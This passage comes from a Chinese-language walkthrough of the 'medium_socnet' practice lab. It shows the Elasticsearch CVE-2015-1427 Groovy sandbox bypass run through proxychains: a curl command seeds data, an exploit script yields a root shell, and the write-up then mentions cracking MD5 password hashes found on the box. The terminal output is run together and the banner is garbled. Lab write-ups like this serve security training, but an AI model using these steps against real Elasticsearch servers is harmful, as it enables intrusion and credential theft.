靶机: medium_socnet( 七 ) _生活百科

可以看到下面报错了，查看错误是 ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞（CVE-2015-1427) 想要要利用需要先查询时至少要求es中有一条数据，所以发送如下数据包，增加一个数据
┌──(kali?kali)-[~/Workspace]└─$ proxychains python2 a.py 172.17.0.2[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$ id[proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OKuid=0(root) gid=0(root) groups=0(root)~$ 使用 curl 在 Elasticsearch 添加一条数据 curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}'
┌──(kali?kali)-[~/Workspace]└─$ proxychains curl -XPOST 'http://172.17.0.2:9200/doc/test' -d '{ "name" : "lupin"}'1 ?[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16[proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OK{"_index":"doc","_type":"test","_id":"AYP5xrq3R3Be1eJ72Xz3","_version":1,"created":true}┌──(kali?kali)-[~/Workspace]└─$ proxychains python2 a.py 172.17.0.2[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.16▓███████▓▄▄▄██████ ▄▄▄█████▓ ██▓ ▄████▄████████? ██ ▓███████▓██▓▓█? ▓██??████▄?██? ▓██? ▓?▓██??██? ?█?██? ▓██? ██?▓█? ▓██?▓██??███?██??██?█▄? ▓██▄? ▓██? ???██??▓█▄ ? ▓██▄?██??██??███?██??██??▓█▄ ?██??██▄▄▄▄██?██?? ▓██▓ ? ?██??▓▓▄ ▄██??██??▓█ ?██ ?▓█▄ ?██??██???████??██████?▓█▓██??██████???██? ? ?██?? ▓███? ??██████???▓█??██▓??████??██████??██████??? ?? ?? ??▓???▓?█?? ?▓? ? ?? ???▓? ?? ??? ?▓? ? ? ? ??????? ?? ?? ??▓?? ??▓?? ??? ? ?? ??? ?? ??? ??? ???? ??? ? ? ??? ? ? ??? ? ??? ? ???? ???????? ???????? ??? ?? ?????????? ????????????Exploit for ElasticSearch , CVE-2015-1427Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$ id[proxychains] Strict chain...127.0.0.1:1080...172.17.0.2:9200...OKuid=0(root) gid=0(root) groups=0(root)~$

并且发现了一个passwords文件，查看文件得到一些账号密码使用 md5 进行解密【网络上一般有在线解密MD5的网站】，并将其解码得到密码，其中只有